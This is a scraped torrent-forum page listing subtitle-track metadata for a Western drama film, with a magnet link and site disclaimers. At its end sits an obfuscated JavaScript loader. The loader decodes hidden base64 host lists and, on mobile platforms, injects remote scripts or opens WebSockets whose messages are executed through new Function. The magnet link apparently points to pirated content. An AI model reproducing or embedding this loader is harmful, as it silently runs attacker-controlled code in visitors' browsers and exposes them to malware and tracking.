  800. Format : UTF-8

  801. Codec ID : S_TEXT/UTF8

  802. Codec ID/Info : UTF-8 Plain Text

  803. Duration : 2 h 16 min

  804. Bit rate : 32 b/s

  805. Count of elements : 1086

  806. Stream size : 32.7 KiB (0%)

  807. Title : Swedish

  808. Language : Swedish

  809. Default : No

  810. Forced : No


  811. Text #30

  812. ID : 49

  813. Format : UTF-8

  814. Codec ID : S_TEXT/UTF8

  815. Codec ID/Info : UTF-8 Plain Text

  816. Duration : 2 h 16 min

  817. Bit rate : 83 b/s

  818. Count of elements : 1156

  819. Stream size : 83.7 KiB (0%)

  820. Title : Thai

  821. Language : Thai

  822. Default : No

  823. Forced : No


  824. Text #31

  825. ID : 50

  826. Format : UTF-8

  827. Codec ID : S_TEXT/UTF8

  828. Codec ID/Info : UTF-8 Plain Text

  829. Duration : 2 h 16 min

  830. Bit rate : 33 b/s

  831. Count of elements : 1106

  832. Stream size : 33.5 KiB (0%)

  833. Title : Turkish

  834. Language : Turkish

  835. Default : No

  836. Forced : No


  837. Text #32

  838. ID : 51

  839. Format : UTF-8

  840. Codec ID : S_TEXT/UTF8

  841. Codec ID/Info : UTF-8 Plain Text

  842. Duration : 2 h 16 min

  843. Bit rate : 55 b/s

  844. Count of elements : 1118

  845. Stream size : 55.5 KiB (0%)

  846. Title : Ukrainian

  847. Language : Ukrainian

  848. Default : No

  849. Forced : No


  850. Text #33

  851. ID : 52

  852. Format : UTF-8

  853. Codec ID : S_TEXT/UTF8

  854. Codec ID/Info : UTF-8 Plain Text

  855. Duration : 2 h 16 min

  856. Bit rate : 48 b/s

  857. Count of elements : 1143

  858. Stream size : 48.2 KiB (0%)

  859. Title : Vietnamese

  860. Language : Vietnamese

  861. Default : No

  862. Forced : No


TAGS 剧情 西部

磁力链:
  • magnet:?xt=urn:btih:63EB9628C9AED31FACDD4B6AC1FBD21D88F3A5FD

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};